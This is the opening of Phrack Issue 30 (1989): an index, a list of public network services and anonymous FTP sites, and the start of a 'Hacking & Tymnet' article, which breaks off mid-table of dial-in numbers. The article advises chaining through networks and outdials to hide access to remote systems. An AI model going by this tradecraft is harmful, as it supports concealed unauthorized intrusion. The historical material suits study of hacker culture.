==Phrack Inc.== Volume Three, Issue 30, File #1 of 12 Phrack Inc. Newsletter Issue XXX Index ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ December 24, 1989 Welcome to Issue 30 of Phrack Inc. We are releasing this just a few short days before the start of a new decade and proud to say that we will continue to bring you more information well into the 1990s. SummerCon 1990! That's right. Preliminary plans are being made right now, so, starting with this issue, keep your eye on Phrack World News for details! The dates have been decided so mark your calendars! This issue of Phrack Inc. features a large article by Goe that contains some information about VM/CMS which can, if used properly, be of great use. Also in this issue, Jack T. Tab brings us a VAX/VMS version of the Fakemail program that was featured for Unix in Phrack Inc. Volume Three, Issue 27, File #8. Also, Network Miscellany III, compiled by Taran King, contains a relatively large list of FTP sites that allow anonymous FTP for those of you who have been poking and stabbing around the Internet. These along with all of the rest of the articles should prove to be interesting reading for you! Do you have access to the Wide Area Networks? Are you on Fidonet? How about UUCP or CompuServe? If so, you can drop a line to us through the networks at the addresses listed below. We'd love to hear from you! Taran King & Knight Lightning phrack@netsys.COM ...!netsys!phrack (phrack@netsys.UUCP) phrack%netsys.COM@LLL-WINKEN.LLNL.GOV phrack%netsys.COM@AMES.ARC.NASA.GOV phrack%netsys.COM@RUTGERS.EDU _______________________________________________________________________________ Table of Contents: 1. Phrack Inc. XXX Index by Taran King and Knight Lightning 2. Network Miscellany III by Taran King 3. Hacking & Tymnet by Synthecide 4. Hacking VM/CMS by Goe 5. The DECWRL Mail Gateway by Dedicated Link 6. Decnet Hackola : Remote Turist TTY (RTT) by *Hobbit* 7. VAX/VMS Fake Mail by Jack T. Tab 8. Consensual Realities in Cyberspace by Paul Saffo 9. The Truth About Lie Detectors by Razor's Edge 10. Western Union Telex, TWX, and Time Service by Phone Phanatic 11-12 Phrack World News XXX/Parts 1-2 by Knight Lightning _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 30, File #2 of 12 Network Miscellany III ~~~~~~~~~~~~~~~~~~~~~~ By Taran King With Extra Special Thanks To Dark OverLord December 24, 1989 CARL ~~~~ The Colorado Alliance of Research Libraries, or CARL, is an on-line service providing information from its member libraries as well as select information databases. The member libraries include Auraria, CU Health Sciences Center, CU Law Library, Denver Public Library, Denver University, Denver University Law School, Colorado School of Mines, University of Northern Colorado, University of Wyoming, Government Publications, plus about five community colleges, Regis College, Colorado State Publications, State Department of Education, Pikes Peak Library, MARMOT Library System, and Boulder Public Library. The information databases include the following: UnConver -- Article Access, "Facts," Encyclopedia, Metro Denver Facts, Info Colorado, Boston Library Consortium, Library News, and New Journal Issues. CARL is available via Telnet at PAC.CARL.ORG (192.54.81.128) and is pretty clear to understand. The Encyclopedia information database, unfortunately, requires a valid username on the system. COMPUSERVE ACCESS VIA INTERNET ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can access CompuServe via Telnet through the gateway/concentrator at CTS.MERIT.EDU (35.1.1.6) by typing "CompuServe" at the "Which Host?" prompt. CTS.MERIT.EDU (35.1.1.6) is a Cisco terminal server installed primarily for users of the Merit computer network in Michigan. This machine has a bunch of serial lines going in each direction to/from a Merit Secondary Communications Processor (SCP), which is the entity that gives you the "Which Host?" prompt. Some other of the Merit services (like outbound Telnet from "Which Host?") have been intentionally limited so that they only work within Merit. Part of this is apparently for reasons of accountability and security (no random hackers dialing in and hacking machines in New Zealand) and part is for access control (ports are scarce and services have costs so they try to limit who uses the thing to paying customers). CompuServe bills connections via this link as if it were via Telenet (which is EXPENSIVE!). It's an X.25 connection somewhere at a decently fast speed. If you have particular questions about all of the various services that can be accessed through Merit, either through the terminal server at CTS.MERIT.EDU (35.1.1.6), Telneting directly into a Merit SCP or PCP, or via dial-up access, contact merit_computer_network@UM.CC.UMICH.EDU or INFO@MERIT on Bitnet. For more details about what can be accessed via CTS.MERIT.EDU, stay tuned to Network Miscellany for part IV in an upcoming issue of Phrack! DATE AND TIME ~~~~~~~~~~~~~ Here's an interesting little trick. Just in case you are on some system without the ability to report what time it is by a command, connect via Telnet to port 13 of an Internet Unix system. This gives you the time and date and then disconnects. Some example systems of this include RUTGERS.EDU, MICA.BERKELEY.EDU, UCBVAX.BERKELEY.EDU, and PIKES.COLORADO.EDU (example: Telnet RUTGERS.EDU 13). FTP ~~~ File Transfer Protocol or FTP is a way to transfer data or text files over the Internet from remote sites. The only problem is figuring out where something is that you want to get. The following is a list of sites accepting anonymous FTP user=anonymous, password=login. It was compiled by Jon Granrose with the help of a number of contributors as well as a couple of lists that had been started. If you have any comments, additions, or corrections, mail them to odin@UCSCB.UCSC.EDU or odin@ucscb.UUCP or 74036.3241@COMPUSERVE.COM. ------------------------------------------------------------------------------- System name IP Address Comments ------------------------------------------------------------------------------- a.cs.uiuc.edu 128.174.5.20 TeX, dvi2ps, gif, texx2.7, amiga accuvax.nwu.edu 129.105.49.1 PibTerm 4.1.3 ahwahnee.stanford.edu 36.56.0.208 pcip interface specs ai.toronto.edu 128.100.1.65 SunOS4.0 SLIP beta, R3 xwebster fixes albanycs.albany.edu 128.204.1.4 Best of comp.graphics allspice.lcs.mit.edu 18.26.0.115 RFC1056 (PCMAIL) stuff, MIT snmp ames.arc.nasa.gov 128.102.18.3 pcrrn, gnu grep arisia.xerox.com 13.1.100.206 lisp, tcp/ip, IDA sendmail kit arizona.edu 128.196.6.1 Icon, SR, SBProlog languages arthur.cs.purdue.edu 128.10.2.1 RCS, Purdue tech reports athena-dist.mit.edu 18.71.0.38 Hesiod name server, Kerberos, moira bitsy.mit.edu 18.72.0.3 MIT worm paper brownvm.brown.edu 128.148.128.40 MAC bu-cs.bu.edu 128.197.2.1 Telecom bu-it.bu.edu 128.197.2.40 Lots of interesting things. bugs.nosc.mil 128.49.0.1 Minix c.isi.edu 26.3.0.103 info-ibmpc (Tenex) cadre.dsl.pittsburgh.edu 128.147.128.1 jove for the Mac camelot.berkeley.edu 128.32.149.18 "pmake", yet another parallel make cayuga.cs.rochester.edu 192.5.53.209 Xfig, LaTeX style, Jove, NL-KR mail list celray.cs.yale.edu 128.36.0.25 ispell, dictionary charon.mit.edu 18.80.0.13 perl+patches, xdvi cheddar.cs.wisc.edu 128.105.2.113 Common Lisp stuff, X11 courier fonts cheops.cis.ohio-state.edu 128.146.8.62 comp.sources.*, alt.sources citi.umich.edu 35.1.128.16 pathalias, (not CITI MacIP), webster clutx.clarkson.edu 128.153.4.3 Turbo C stuff, net kit cmx.npac.syr.edu 128.230.7.8 Lots of stuff cod.nosc.mil 128.49.16.5 birdlist, PCstuff columbia.edu 10.3.0.89 NEST network simulation testbed crocus.waterloo.edu 129.97.128.6 STEVIE (vi-clone) in /u/grwalter/ftp cs.cmu.edu 128.2.222.173 screen, msdos interrupt list, zoo (in /afs/cs.cmu.edu/user/ralf/pub) cs.orst.edu 128.193.32.1 Xlisp cs.rochester.edu 192.5.53.209 See cayuga.cs.rochester.edu cs.utah.edu 128.110.4.21 A Tour of the Worm, amiga forth csc.ti.com 128.247.159.141 Preliminary clx document cunixc.cc.columbia.edu 128.59.40.130 MM mailer, Kermit, CAP/KIP cygnusx1.cs.utk.edu 128.169.201.12 GCC, MM, Scheme dartvax.dartmouth.edu 129.170.16.4 ?? decwrl.dec.com 128.45.1.1 No FTP; gatekeeper.dec.com devvax.tn.cornell.edu 192.35.82.200 tn3270, gated drizzle.cs.uoregon.edu 128.223.4.1 raytracing archive (markv) dsrgsun.ces.cwru.edu 129.22.16.2 Minix, TOS atariST gcc from bammi ecla.usc.edu 26.21.0.65 mg emacs elbereth.rutgers.edu 128.6.4.61 /pub emx.utexas.edu 128.83.1.33 /net.directory expo.lcs.mit.edu 18.30.0.212 a home of X, portable bitmaps f.ms.uky.edu 128.163.128.6 Lots of interesting things flash.bellcore.com 128.96.32.20 Karn's RFC & IEN coll, Latest NET bits ftp.ncsa.uiuc.edu 128.174.20.50 NCSA Telnet source, Mathematica gatekeeper.dec.com 128.45.9.52 X11, recipes, cron, map, Larry Wall stuff ghostwheel.andrew.cmu.edu 128.2.35.1 Hershey fonts giza.cis.ohio-state.edu 128.146.8.61 X11R3, PEX gpu.utcs.toronto.edu 128.100.100.1 Lots of stuff, pd ksh grape.ecs.clarkson.edu 128.153.13.196 Opus BBS, ms-dos, graphics gregorio.stanford.edu 36.8.0.11 vmtp-ip, ip-multicast gtss.gatech.edu 128.61.4.1 amiga rexx stuff hamlet.caltech.edu 192.12.19.3 Nansi (VMS) hanauma.stanford.edu 36.51.0.16 Vplot graphical system him1.cc.umich.edu 35.1.1.43 atari st (cd PC7:) hipl.psych.nyu.edu 128.122.132.2 Jove in pub (v4.9 is latest) hogg.cc.uoregon.edu 128.223.20.5 NorthWestNet site info hotel.cis.ksu.edu 129.130.10.12 XBBS, msdos, U3G toolkit hubcap.clemson.edu 192.5.219.1 GIF files, RFCs husc6.harvard.edu 128.103.1.56 pcip, appleII archives, uumap copy and soon the parts of the ucb tahoe tape that are marked not-at&t icec.andrew.cmu.edu 128.223.4.1 CMU Tutor, ICEC ics.uci.edu 128.195.0.1 perfect hash function gen., web-to-c indri.primate.wisc.edu 128.104.230.11 Macintosh Trans{Skel, Display, Edit} ix1.cc.utexas.edu 128.83.1.21 amiga ix2.cc.utexas.edu 128.83.1.29 amiga iuvax.cs.indiana.edu 129.79.254.192 unix arc et al j.cc.purdue.edu 128.210.0.3 c.s. {unix, x, amiga}, elm, uupc jpl-devvax.jpl.nasa.gov 128.149.8.43 perl author june.cs.washington.edu 128.95.1.4 TeXhax, dviapollo, SmallTalk, web2c kampi.hut.fi 128.214.3.9 DES routines (unrestricted) kolvi.hut.fi 128.214.3.7 Ham radio (FINLAND) kuhub.cc.ukans.edu 129.237.1.10 VMS news labrea.stanford.edu 36.8.0.47 dvips, paranoia lambda.lanl.gov 128.165.4.4 Toolpack/1 for math sw in f77 lancaster.andrew.cmu.edu 128.2.13.21 CMU PCIP, RFC1073 telnetd, RFC1048 bootp larry.cs.washington.edu 128.95.1.7 Poker lbl-csam.arpa 128.3.254.6 See rtsg.ee.lbl.gov linc.cis.upenn.edu 128.91.2.8 psfig for ditroff, TeX llnl-winken.llnl.gov 128.115.14.1 comp.sources.misc louie.udel.edu 128.175.1.3 net.exe, minix, NORD<>LINK, MH, amiga m9-520-1.mit.edu 18.80.0.45 Xim (X image viewer) maxwell.physics.purdue.edu 128.46.135.3 /pub/bible.tar.Z mailrus.cc.umich.edu 35.1.1.26 This list, unix arc, apollo stuff megaron.arizona.edu 192.12.69.1 See arizona.edu mimsy.umd.edu 128.8.128.8 declarative languages bib, SLIP monk.proteon.com 128.185.123.16 cc:mail to smtp gateway mordred.cs.purdue.edu 128.10.2.2 X11R3 ncsuvx.ncsu.edu 128.109.153.1 Hack, Moria, Empire, Ogre net1.ucsd.edu 128.54.0.10 macintosh (tenex) nic.mr.net 192.12.250.5 Minnesota Regional Net traffic data nic.ddn.mil 10.0.0.51 RFC, other network info in NETINFO: nis.nsf.net 35.1.1.48 Merit info, NSFnet Link Letter nisc.nyser.net 192.33.4.10 Nysernet, IETF, GOSIP nl.cs.cmu.edu 128.2.222.56 Fuzzy Pixmap 0.84 in /usr/mlm/ftp oddjob.uchicago.edu 128.135.4.2 NNTP, Sendmail, utils, Ethernet stuff omnigate.clarkson.edu 128.153.4.2 PS maps of the Domain Name system. parcvax.xerox.com 13.1.100.206 See arisia.xerox.com panarea.usc.edu 128.125.3.54 Archive for "maps" pawl.rpi.edu 128.113.10.2 DVI stuff, Atari ST, vi for dos plains.nodak.edu 192.33.18.50 ASCII pics, /pub/picture po1.andrew.cmu.edu 128.2.11.131 ?? po2.andrew.cmu.edu 128.2.249.105 ?? postgres.berkeley.edu 128.32.149.1 University INGRES, prep.ai.mit.edu 128.52.32.14 GNU, MIT C Scheme, gnu e?grep radio.astro.utoronto.ca 128.100.75.4 UFGATE, msdos, lots rascal.ics.utexas.edu 128.83.144.1 KCL, MAXIMA, GCC-386, BoyerMoore prover relgyro.stanford.edu 36.64.0.50 sunrast-to-pc riacs.edu 128.102.16.8 SLIP ringo.rutgers.edu 128.6.5.77 Omega sources rtsg.ee.lbl.gov 128.3.254.68 flex sally.cs.utexas.edu Networking stuff sbcs.sunysb.edu 128.48.2.3 sun raster tools scam.berkeley.edu 128.32.138.1 X sources, etc. science.utah.edu 118.110.192.2 TeX things (tenex) score.stanford.edu 36.8.0.46 TexHax, Atari (tenex) sh.cs.net 192.31.103.3 Misc shambhala.berkeley.edu xrn sics.se 192.16.123.90 Ham radio (SWEDEN) simtel20.arpa 26.0.0.74 See wsmr-simtel20.army.mil spam.istc.sri.com 128.18.4.3 Gnu, more sphere.mast.ohio-state.edu 128.146.7.200 phone (with bugs fixed) squid.cs.ucla.edu 128.97.16.28 soc.med.aids sri-nic.arpa 10.0.0.51 See nic.ddn.mil ssyx.ucsc.edu 128.114.133.1 atari, amiga, gifs sumex.stanford.edu 36.44.0.6 mac archives, Mycin (SUN4), imap sumex-2060.stanford.edu 36.45.0.87 Old home of mac archives (tenex) sun.cnuce.cnr.it 192.12.192.4 atalk, ka9q sun.soe.clarkson.edu 128.153.12.3 Packet Driver, X11 fonts, TeX surya.waterloo.edu 129.97.129.72 gifs, tiff format, gif2ras stolaf.edu 130.71.128.1 news, anime, bitmaps svax.cs.cornell.edu 128.84.254.2 TransFig, Fig-FS, NetHack swan.ulowell.edu 129.63.224.1 sendmail, amiga, music, c.s. unix thyme.lcs.mit.edu 18.26.0.94 SUPDUP titan.rice.edu 128.42.1.30 sun-spots, amiga ispell tmc.edu 128.249.1.1 FUBBS bbs list topaz.rutgers.edu 128.6.4.194 amiga trantor.harris-atd.com 26.13.0.98 contool, chuck@%s's tools trantor.umd.edu 128.8.1.14 Network Time Protocol(NTP), info-amiga trwind.ind.trw.com 129.4.16.70 Turbo C src for net.exe tumtum.cs.umd.edu 128.8.129.49 NeWS pd software tut.cis.ohio-state.edu 128.146.8.60 GNU, lots of interesting things ucbarpa.berkeley.edu 128.32.130.11 tn3270, pub/4.3 ucbvax.berkeley.edu 128.32.149.36 nntp, gnews, awm, empire ucdavis.ucdavis.edu 128.120.2.1 ?? ucsd.edu 128.54.16.1u KA9Q archives, packet driver umn-cs.cs.umn.edu 128.101.224.1 vectrex, mac, unix-pc unmvax.unm.edu 129.24.12.128 getmaps, unocss.unl.edu 129.93.1.11 alt.sex, motss utadnx.cc.utexas.edu 128.83.1.26 VMS sources (zetaps, laser, sxlps) uunet.uu.net 192.12.141.129 usenet archives, much more ux.acss.umn.edu 128.101.63.2 usenix 87 archives uxa.cso.uiuc.edu 128.174.2.1 mac, pcsig uxc.cso.uiuc.edu 128.174.5.50 Games, misc uxe.cso.uiuc.edu 128.174.5.54 amiga/Fish disks, PC-SIG 1-499 vax.ftp.com 128.127.25.100 FTP software, inc. venera.isi.edu 128.9.0.32 statspy (NNstat) venus.ycc.yale.edu 130.132.1.5 SBTeX vgr.brl.mil 128.63.4.4 bsd ping + record route venera.isi.edu 128.9.0.32 GNU Chess watmath.waterloo.edu 129.97.128.1 Lots of stuff wsmr-simtel20.army.mil 26.0.0.74 MS-DOS, Unix, CP/M, Mac, lots! (tenex) xanth.cs.odu.edu 128.82.8.1 c.srcs.{x, unix, misc, games, amiga}, X10R4 zaphod.ncsa.uiuc.edu 128.174.20.50 NCSA Telnet source, binaries z.andrew.cmu.edu 128.2.30.8 bugfixar + div MELVYL ONLINE CATALOG ~~~~~~~~~~~~~~~~~~~~~ This service is provided by the University of California schools. It is available via Telnet by connecting to MELVYL.UCOP.EDU (31.1.0.1). It basically provides information searching capabilities and provides literary sources where the "keyword" that you used may be found. It is relatively self-explanatory. NAMESERVERS ~~~~~~~~~~~ By connecting to port 101 on certain Internet systems, you have connected to the nameserver of that domain. To get a list of all of the subdomains of the main domain, type ALL. A sample system is VIOLET.BERKELEY.EDU but be forewarned that the output from typing ALL is *EXTREMELY* long on this particular system! (Example: Telnet VIOLET.BERKELEY.EDU 101). PUBLIC ACCESS UNIX INFORMATION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ For those of you that are still interested in more information on the Public Access Unix systems that were listed in Network Miscellany II featured in Phrack 29, here are a few more details. For specific information concerning the nodes discussed, refer to the previous article. For those of you who are not local to a Public Access Unix system, Portal can be reached via PC-Pursuit for $25 a month and a $10 access fee for "portal" (off-peak). For information, contact John Little (jel@CUP.PORTAL.COM). The Big Electric Cat (dasys1.UUCP) claims to be cheaper than most well- connected public sites. They have special billing for "organizational" accounts if you're interested and their standard rate is $5 a month for an account (no time restrictions). The Big Electric Cat offers a superset of the USENET newsgroups as well as unrestricted mail (!), a simplified set of prompts for most system functions, games, and several other features The World (WORLD.STD.COM) in Brookline, MA (Boston) is a Sun4/280 running Sun/OS 4.0.3 (Unix.) They offer electronic mail (to most anyplace), USENET, ClariNet and general Unix access. They dial UUNET and other sites frequently. To create an account you just dial (617)739-WRLD (9753) and login as user "new" (the login prompt gives instructions). They ask for some info (name, address, etc.) and a MasterCard or Visa account. Rates for The World ~~~~~~~~~~~~~~~~~~~ All times are East Coast, USA. INITIAL SIGN-UP $25.00 fee, applied to first month's charges. BASIC ACCESS RATES 8AM-6PM $8.00/hour (Monday thru Friday) 6PM-12M $5.00/hour 12M-8AM $2.50/hour Weekends and holidays, 8AM-12M, $5/hour. Disk Quota ~~~~~~~~~~ A "byte" is equivalent to one character of storage. A disk block is 1024 bytes. First 512 disk blocks No Charge Additional Quota $0.01/block/month (approx. $10/MB/month) Note that disk charges are based on your requested disk quota (system imposed limit on your usage) and not your actual usage. Disk quota charges are pro-rated. Electronic Mail ~~~~~~~~~~~~~~~ No charge for electronic mail between users of The World. No charge for first 512 blocks of mail per month. $0.01 per block of mail thereafter in any given month (approx. $10/MB/month). CPU Usage ~~~~~~~~~ In general, they do not charge for these resources for typical accounts interested in electronic communications. Customers who wish to use their system for compute or memory intensive applications should contact their office for rates. USENET ~~~~~~ Local usage, no charge. Network usage, no charge at this time. Printing And Fax ~~~~~~~~~~~~~~~~ To be announced. Upload or Download Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~ No additional charge. UNIVERSITY OF CALIFORNIA AT BERKELEY NETWORK INFORMATION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is a service which I, personally, have found to be extremely useful. If you need network information on virtually any system, connect to the University of California at Berkeley Network Information at JADE.BERKELEY.EDU Port 117 (example: Telnet JADE.BERKELEY.EDU 117). Once you are logged into the system automatically, it prompts you for a command or type "?" for a list of commands. The help menu is relatively easy to understand. You can get Bitnet network table listings or Internet numerical addresses or Internet mail exchanger listings or UUCP node information or UUCP node paths plus more. It's very useful in case you're having difficulty sending mail to a particular node from your own node or if you're trying to connect to a system via FTP or Telnet that your system doesn't recognize (i.e. get the numerical address from the server and FTP or Telnet to the numerical address). _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 30, File #3 of 12 [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-] [-] [-] Hacking & Tymnet [-] [-] [-] [-] by [-] [-] [-] [-] Synthecide [-] [-] [-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] There are literally hundreds of systems connected to some of these larger networks, like Tymnet and Telenet. Navigation around these networks is very simple, and usually well explained in their on-line documentation. Furthermore, some systems will actually tell you what is connected and how to get to it. In the case of Tymnet, after dialing in, at the log in prompt, type "information" for the on-line documentation. Accessing systems through networks is as simple as providing an address for it to connect to. The best way to learn about the addresses and how to do things on a network is to read "A Novice's Guide to Hacking (1989 Edition)" which was in Issue 22, File 4 of 12, Volume Two (December 23, 1988). Some points are re-iterated here. Once on a network, you provide the NUA (network user address) of the system you wish to connect to. NUAs are strings of 15 digits, broken up in to 3 fields, the NETWORK ADDRESS, the AREA PREFIX, and the DNIC. Each field has 5 digits, and are left padded with 0's where necessary. The DNIC determines which network to take the address from. Tymnet, for example, is 03106. 03110 is Telenet. The AREA PREFIX and NETWORK ADDRESS determine the connection point. By providing the address of the system that you wish to connect to, you will be accessing it through the net... as if you were calling it directly. Obviously, then, this provides one more level of security for access. By connecting to an outdial, you can increase again the level of security you enjoy, by using the outdial in that area to connect to the remote system. Addendum -- Accessing Tymnet Over Local Packet Networks This is just another way to get that extra step and/or bypass other routes. This table is copied from Tymnet's on-line information. As said earlier, it's a great resource, this on-line information! BELL ATLANTIC NODE CITY STATE SPEED ACCESS NUMBER NTWK ---- ------------------- -------------- ------ ------------ ---- 03526 DOVER DELAWARE 300/2400 302/734-9465 @PDN 03526 GEORGETOWN DELAWARE 300/2400 302/856-7055 @PDN 03526 NEWARK DELAWARE 300/2400 302/366-0800 @PDN 03526 WILMINGTON DELAWARE 300/1200 302/428-0030 @PDN 03526 WILMINGTON DELAWARE 2400 302/655-1144 @PDN 06254 WASHINGTON DIST. OF COL. 300/1200 202/479-7214 @PDN 06254 WASHINGTON (MIDTOWN) DIST. OF COL. 2400 202/785-1688 @PDN 06254 WASHINGTON (DOWNTOWN) DIST. OF COL. 300/1200 202/393-6003 @PDN 06254 WASHINGTON (MIDTOWN) DIST. OF COL. 300/1200 202/293-4641 @PDN 06254 WASHINGTON DIST. OF COL. 300/1200 202/546-5549 @PDN 06254 WASHINGTON DIST. OF COL. 300/1200 202/328-0619 @PDN 06254 BETHESDA MARYLAND 300/1200 301/986-9942 @PDN 06254 COLESVILLE MARYLAND 300/2400 301/989-9324 @PDN 06254 HYATTSVILLE MARYLAND 300/1200 301/779-9935 @PDN 06254 LAUREL MARYLAND 300/2400 301/490-9971 @PDN 06254 ROCKVILLE MARYLAND 300/1200 301/340-9903 @PDN 06254 SILVER SPRING MARYLAND 300/1200 301/495-9911 @PDN 07771 BERNARDSVILLE NEW JERSEY 300/2400 201/766-7138 @PDN 07771 CLINTON NEW JERSEY 300-1200 201/730-8693 @PDN 07771 DOVER NEW JERSEY 300/2400 201/361-9211 @PDN 07771 EATONTOWN/RED BANK NEW JERSEY 300/2400 201/758-8000 @PDN 07771 ELIZABETH NEW JERSEY 300/2400 201/289-5100 @PDN 07771 ENGLEWOOD NEW JERSEY 300/2400 201/871-3000 @PDN 07771 FREEHOLD NEW JERSEY 300/2400 201/780-8890 @PDN 07771 HACKENSACK NEW JERSEY 300/2400 201/343-9200 @PDN 07771 JERSEY CITY NEW JERSEY 300/2400 201/659-3800 @PDN 07771 LIVINGSTON NEW JERSEY 300/2400 201/533-0561 @PDN 07771 LONG BRANCH/RED BANK NEW JERSEY 300/2400 201/758-8000 @PDN 07771 MADISON NEW JERSEY 300/2400 201/593-0004 @PDN 07771 METUCHEN NEW JERSEY 300/2400 201/906-9500 @PDN 07771 MIDDLETOWN NEW JERSEY 300/2400 201/957-9000 @PDN 07771 MORRISTOWN NEW JERSEY 300/2400 201/455-0437 @PDN 07771 NEWARK NEW JERSEY 300/2400 201/623-0083 @PDN 07771 NEW BRUNSWICK NEW JERSEY 300/2400 201/247-2700 @PDN 07771 NEW FOUNDLAND NEW JERSEY 300/2400 201/697-9380 @PDN 07771 PASSAIC NEW JERSEY 300/2400 201/473-6200 @PDN 07771 PATERSON NEW JERSEY 300/2400 201/345-7700 @PDN 07771 PHILLIPSBURG NEW JERSEY 300/2400 201/454-9270 @PDN 07771 POMPTON LAKES NEW JERSEY 300/2400 201/835-8400 @PDN 07771 RED BANK NEW JERSEY 300/2400 201/758-8000 @PDN 07771 RIDGEWOOD NEW JERSEY 300/2400 201/445-4800 @PDN 07771 SOMERVILLE NEW JERSEY 300/2400 201/218-1200 @PDN 07771 SOUTH RIVER NEW JERSEY 300/2400 201/390-9100 @PDN 07771 SPRING LAKE NEW JERSEY 300/2400 201/974-0850 @PDN 07771 TOMS RIVER NEW JERSEY 300/2400 201/286-3800 @PDN 07771 WASHINGTON NEW JERSEY 300/2400 201/689-6894 @PDN 07771 WAYNE/PATERSON NEW JERSEY 300/2400 201/345-7700 @PDN 03526 ALLENTOWN PENNSYLVANIA 300/1200 215/435-0266 @PDN 11301 ALTOONA PENNSYLVANIA 300/1200 814/946-8639 @PDN 11301 ALTOONA PENNSYLVANIA 2400 814/949-0505 @PDN 03526 AMBLER PENNSYLVANIA 300/1200 215/283-2170 @PDN 10672 AMBRIDGE PENNSYLVANIA 300/1200 412/266-9610 @PDN 10672 CARNEGIE PENNSYLVANIA 300/1200 412/276-1882 @PDN 10672 CHARLEROI PENNSYLVANIA 300/1200 412/483-9100 @PDN 03526 CHESTER HEIGHTS PENNSYLVANIA 300/1200 215/358-0820 @PDN 03526 COATESVILLE PENNSYLVANIA 300/1200 215/383-7212 @PDN 10672 CONNELLSVILLE PENNSYLVANIA 300/1200 412/628-7560 @PDN 03526 DOWNINGTON/COATES. PENNSYLVANIA 300/1200 215/383-7212 @PDN 03562 DOYLESTOWN PENNSYLVANIA 300/1200 215/340-0052 @PDN 03562 GERMANTOWN PENNSYLVANIA 300/1200 215-843-4075 @PDN 10672 GLENSHAW PENNSYLVANIA 300/1200 412/487-6868 @PDN 10672 GREENSBURG PENNSYLVANIA 300/1200 412/836-7840 @PDN 11301 HARRISBURG PENNSYLVANIA 300/1200 717/236-3274 @PDN 11301 HARRISBURG PENNSYLVANIA 2400 717/238-0450 @PDN 10672 INDIANA PENNSYLVANIA 300/1200 412/465-7210 @PDN 03526 KING OF PRUSSIA PENNSYLVANIA 300/1200 215/270-2970 @PDN 03526 KIRKLYN PENNSYLVANIA 300/1200 215/789-5650 @PDN 03526 LANSDOWNE PENNSYLVANIA 300/1200 215/626-9001 @PDN 10672 LATROBE PENNSYLVANIA 300/1200 412/537-0340 @PDN 11301 LEMOYNE/HARRISBURG PENNSYLVANIA 300/1200 717/236-3274 @PDN 10672 MCKEESPORT PENNSYLVANIA 300/1200 412/673-6200 @PDN 10672 NEW CASTLE PENNSYLVANIA 300/1200 412/658-5982 @PDN 10672 NEW KENSINGTON PENNSYLVANIA 300/1200 412/337-0510 @PDN 03526 NORRISTOWN PENNSYLVANIA 300/1200 215/270-2970 @PDN 03526 PAOLI PENNSYLVANIA 300/1200 215/648-0010 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/923-7792 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/557-0659 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/545-7886 @PDN 03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/677-0321 @PDN 03562 PHILADELPHIA PENNSYLVANIA 2400 215/625-0770 @PDN 10672 PITTSBURGH PENNSYLVANIA 300/1200 412/281-8950 @PDN 10672 PITTSBURGH PENNSYLVANIA 300/1200 412-687-4131 @PDN 10672 PITTSBURGH PENNSYLVANIA 2400 412/261-9732 @PDN 10672 POTTSTOWN PENNSYLVANIA 300/1200 215/327-8032 @PDN 03526 QUAKERTOWN PENNSYLVANIA 300/1200 215/538-7032 @PDN 03526 READING PENNSYLVANIA 300/1200 215/375-7570 @PDN 10672 ROCHESTER PENNSYLVANIA 300/1200 412/728-9770 @PDN 03526 SCRANTON PENNSYLVANIA 300/1200 717/348-1123 @PDN 03526 SCRANTON PENNSYLVANIA 2400 717/341-1860 @PDN 10672 SHARON PENNSYLVANIA 300/1200 412/342-1681 @PDN 03526 TULLYTOWN PENNSYLVANIA 300/1200 215/547-3300 @PDN 10672 UNIONTOWN PENNSYLVANIA 300/1200 412/437-5640 @PDN 03562 VALLEY FORGE PENNSYLVANIA 300/1200 215/270-2970 @PDN 10672 WASHINGTON PENNSYLVANIA 300/1200 412/223-9090 @PDN 03526 WAYNE PENNSYLVANIA 300/1200 215/341-9605 @PDN 10672 WILKINSBURG PENNSYLVANIA 300/1200 412/241-1006 @PDN 06254 ALEXANDRIA VIRGINIA 300/1200 703/683-6710 @PDN 06254 ARLINGTON VIRGINIA 300/1200 703/524-8961 @PDN 06254 FAIRFAX VIRGINIA 300/1200 703/385-1343 @PDN 06254 MCLEAN VIRGINIA 300/1200 703/848-2941 @PDN @PDN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN) (CONNECT MESSAGE) . _. _. _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS) WELCOME TO THE BPA/DST PDN *. _T _ _< _C _R _> _ (TYMNET ADDRESS) 131069 (ADDRESS CONFIRMATION - TYMNET DNIC) COM (CONFIRMATION OF CALL SET-UP) -GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES) BELL SOUTH NODE CITY STATE DENSITY ACCESS NUMBER MODEM ----- -------------------- -------------- ------ ------------ ----- 10207 ATLANTA GEORGIA 300/1200 404/261-4633 @PLSK 10207 ATHENS GEORGIA 300/1200 404/354-0614 @PLSK 10207 COLUMBUS GEORGIA 300/1200 404/324-5771 @PLSK 10207 ROME GEORGIA 300/1200 404/234/7542 @PLSK @PLSK BELLSOUTH - NETWORK NAME IS PULSELINK (CONNECT MESSAGE) . _. _. _ _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS) (DOES NOT ECHO TO THE TERMINAL) CONNECTED PULSELINK 1 _3 _1 _0 _6 _ (TYMNET ADDRESS) (DOES NOT ECHO TO THE TERMINAL) PULSELINK: CALL CONNECTED TO 1 3106 -GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES) PACIFIC BELL NODE CITY STATE DENSITY ACCESS NUMBER NTWK ----- ------------------- -------------- ------ ------------ ---- 03306 BERKELEY CALIFORNIA 300/1200 415-548-2121 @PPS 06272 EL SEGUNDO CALIFORNIA 300/1200 213-640-8548 @PPS 06272 FULLERTON CALIFORNIA 300/1200 714-441-2777 @PPS 06272 INGLEWOOD CALIFORNIA 300/1200 213-216-7667 @PPS 06272 LOS ANGELES(DOWNTOWN) CALIFORNIA 300/1200 213-687-3727 @PPS 06272 LOS ANGELES CALIFORNIA 300/1200 213-480-1677 